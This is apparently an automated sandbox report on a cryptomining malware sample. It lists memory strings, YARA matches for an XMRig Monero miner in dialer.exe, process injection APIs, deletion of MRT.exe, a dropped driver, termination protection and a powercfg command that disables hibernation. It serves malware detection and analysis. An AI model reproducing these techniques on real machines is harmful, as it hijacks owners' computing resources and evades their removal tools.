          Source: svchost.exe, 0000006F.00000000.1621428719.000001F22BA8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ
          Source: svchost.exe, 0000006F.00000000.1620429839.000001F22BA41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uN
          Source: lsass.exe, 00000031.00000002.2736247539.000001BA8E3E1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409136630.000001BA8E23D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409782436.000001BA8E3CB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2692346869.000001BA8E220000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E29B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E29E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2700477885.000001BA8E283000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2713705631.000001BA8E297000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1409358052.000001BA8E28A000.00000004.00000001.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 00000031.00000002.2692346869.000001BA8E220000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
          Source: OfficeClickToRun.exe, 00000074.00000000.1742941039.000001570E118000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
          Source: lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 00000031.00000000.1407435054.000001BA8DA4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2630628617.000001BA8DA4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: svchost.exe, 0000000C.00000002.2617581393.000001560191C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2549220187.0000015601085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
          Source: svchost.exe, 00000006.00000002.1370890183.0000022ADE613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.comc
          Source: lsass.exe, 00000031.00000002.2692346869.000001BA8E220000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1408938613.000001BA8E200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
          Source: svchost.exe, 00000061.00000000.1548580428.000001D50025A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com/
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1371055435.0000022ADE65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
          Source: svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1371073026.0000022ADE675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370267523.0000022ADE65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370421200.0000022ADE668000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370002682.0000022ADE671000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000006.00000002.1371073026.0000022ADE677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370002682.0000022ADE671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000006.00000003.1370089560.0000022ADE66A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000006.00000003.1369934811.0000022ADE678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370267523.0000022ADE65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370421200.0000022ADE668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000006.00000003.1370089560.0000022ADE66A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370421200.0000022ADE668000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000006.00000002.1371017605.0000022ADE647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: svchost.exe, 00000006.00000003.1370376221.0000022ADE632000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370296542.0000022ADE649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000006.00000003.1370089560.0000022ADE66A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: OfficeClickToRun.exe, 00000074.00000002.2761215419.000001570C208000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com
          Source: svchost.exe, 0000006B.00000000.1592264170.00000184E25FB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000002.2709297650.00000184E25FD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1604978379.00000184E2C40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod
          Source: svchost.exe, 00000002.00000003.1203500301.0000016358DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdC:
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
          Source: svchost.exe, 00000002.00000003.1203500301.0000016358DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2C:
          Source: OfficeClickToRun.exe, 00000074.00000002.2678502917.000001570BEA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: OfficeClickToRun.exe, 00000074.00000002.2678502917.000001570BEA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1652CE
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize19g
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeation
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedty
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeened(
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeger
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeltip
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenies
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeoggerp
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeols
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeoxy2
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizespacex
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetos8
          Source: svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: svchost.exe, 0000006B.00000000.1599616250.00000184E28CD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: svchost.exe, 0000006B.00000000.1599616250.00000184E28CD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comN
          Source: svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1605347716.00000184E2C79000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1605693530.00000184E2CFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
          Source: svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1371055435.0000022ADE65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
          Source: svchost.exe, 00000058.00000000.1519460664.000002AB7DE12000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-ch1p.notify.windows.com/?token=AwYAAAAYHqKf08ZPoZ860Y%2foGt%2fNxdm9wovwzD08hc8iwriUJ1DW
          Source: svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          Operating System Destruction

          barindex
          Protects its processes via BreakOnTermination flag
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess information set: 01 00 00 00
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess information set: 01 00 00 00

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: dialer.exe PID: 6444, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Uses powercfg.exe to modify the power settings
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\dialer.exeProcess Stats: CPU usage > 24%
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,41_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: 80_2_0000000140001394 NtAlpcOpenSenderProcess,80_2_0000000140001394
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_00000280923828C8 NtEnumerateValueKey,NtEnumerateValueKey,131_2_00000280923828C8
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeFile created: C:\Windows\TEMP\sidneyeifgjd.sys
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeFile deleted: C:\Windows\System32\MRT.exeJump to behavior
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_000000014000226C41_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_00000001400014D841_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_000000014000256041_2_0000000140002560
          Source: C:\Windows\System32\dialer.exeCode function: 80_2_000000014000324080_2_0000000140003240
          Source: C:\Windows\System32\dialer.exeCode function: 80_2_00000001400027D080_2_00000001400027D0
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_00000280923944A8131_2_00000280923944A8
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_000002809238DCE0131_2_000002809238DCE0
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_0000028092382B2C131_2_0000028092382B2C
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\sidneyeifgjd.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
